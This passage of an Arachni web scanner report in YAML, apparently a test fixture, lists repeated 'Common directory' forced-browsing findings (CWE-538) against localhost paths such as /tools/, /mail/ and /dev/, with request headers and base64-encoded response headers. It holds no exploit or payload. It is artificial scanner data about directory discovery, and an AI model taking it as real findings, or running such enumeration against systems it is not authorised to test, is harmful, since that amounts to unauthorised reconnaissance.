Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
Ng==
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations: []
internal_modname: CommonDirectories
internal_modname: CommonDirectories
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
url: http://localhost:8099/share/
elem: path
method: ''
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
opts:
:regexp: ''
url: http://localhost:8099/share/
injected: share
id: share
elem: path
remarks: {}
method: ''
response: share
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
NQ==
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations: []
internal_modname: CommonDirectories
internal_modname: CommonDirectories
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
url: http://localhost:8099/tools/
elem: path
method: ''
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
opts:
:regexp: ''
url: http://localhost:8099/tools/
injected: tools
id: tools
elem: path
remarks: {}
method: ''
response: tools
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
NQ==
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations: []
internal_modname: CommonDirectories
internal_modname: CommonDirectories
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
url: http://localhost:8099/email/
elem: path
method: ''
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
opts:
:regexp: ''
url: http://localhost:8099/email/
injected: email
id: email
elem: path
remarks: {}
method: ''
response: email
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
NQ==
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations: []
internal_modname: CommonDirectories
internal_modname: CommonDirectories
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
url: http://localhost:8099/mail/
elem: path
method: ''
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
opts:
:regexp: ''
url: http://localhost:8099/mail/
injected: mail
id: mail
elem: path
remarks: {}
method: ''
response: mail
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
NA==
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations: []
internal_modname: CommonDirectories
internal_modname: CommonDirectories
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
url: http://localhost:8099/php/
elem: path
method: ''
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
opts:
:regexp: ''
url: http://localhost:8099/php/
injected: php
id: php
elem: path
remarks: {}
method: ''
response: php
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
Mw==
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations: []
internal_modname: CommonDirectories
internal_modname: CommonDirectories
- !ruby/object:Arachni::Issue
verification: true
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
url: http://localhost:8099/utils/
elem: path
method: ''
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations:
- !ruby/object:Arachni::Issue
verification: true
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
opts:
:regexp: ''
url: http://localhost:8099/utils/
injected: utils
id: utils
elem: path
remarks: {}
method: ''
response: utils
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
NQ==
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations: []
internal_modname: CommonDirectories
internal_modname: CommonDirectories
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
url: http://localhost:8099/util/
elem: path
method: ''
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
opts:
:regexp: ''
url: http://localhost:8099/util/
injected: util
id: util
elem: path
remarks: {}
method: ''
response: util
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
NA==
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations: []
internal_modname: CommonDirectories
internal_modname: CommonDirectories
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
url: http://localhost:8099/dev/
elem: path
method: ''
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
opts:
:regexp: ''
url: http://localhost:8099/dev/
injected: dev
id: dev
elem: path
remarks: {}
method: ''
response: dev
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
Mw==
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations: []
internal_modname: CommonDirectories
internal_modname: CommonDirectories
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
url: http://localhost:8099/jsp/
elem: path
method: ''
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
opts:
:regexp: ''
url: http://localhost:8099/jsp/
injected: jsp
id: jsp
elem: path
remarks: {}
method: ''
response: jsp
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
Mw==
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations: []
internal_modname: CommonDirectories
internal_modname: CommonDirectories
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
url: http://localhost:8099/devel/
elem: path
method: ''
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
opts:
:regexp: ''
url: http://localhost:8099/devel/
injected: devel
id: devel
elem: path
remarks:
:stuff:
- Blah
- Blah2
method: ''
response: devel
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
NQ==
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations: []
internal_modname: CommonDirectories
internal_modname: CommonDirectories
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
url: http://localhost:8099/development/
elem: path
method: ''
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
opts:
:regexp: ''
url: http://localhost:8099/development/
injected: development
id: development
elem: path
remarks: {}
method: ''
response: development
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
MTE=
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations: []
internal_modname: CommonDirectories
internal_modname: CommonDirectories
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
url: http://localhost:8099/updates/
elem: path
method: ''
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
opts:
:regexp: ''
url: http://localhost:8099/updates/
injected: updates
id: updates
elem: path
remarks: {}
method: ''
response: updates
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
Nw==
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations: []
internal_modname: CommonDirectories
internal_modname: CommonDirectories
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
url: http://localhost:8099/register/
elem: path
method: ''
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
opts:
:regexp: ''
url: http://localhost:8099/register/
injected: register
id: register
elem: path
remarks: {}
method: ''
response: register
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
OA==
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations: []
internal_modname: CommonDirectories
internal_modname: CommonDirectories
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
url: http://localhost:8099/search/
elem: path
method: ''
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
opts:
:regexp: ''
url: http://localhost:8099/search/
injected: search
id: search
elem: path
remarks: {}
method: ''
response: search
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
Ng==
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations: []
internal_modname: CommonDirectories
internal_modname: CommonDirectories
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
url: http://localhost:8099/service/
elem: path
method: ''
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
opts:
:regexp: ''
url: http://localhost:8099/service/
injected: service
id: service
elem: path
remarks: {}
method: ''
response: service
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
response:
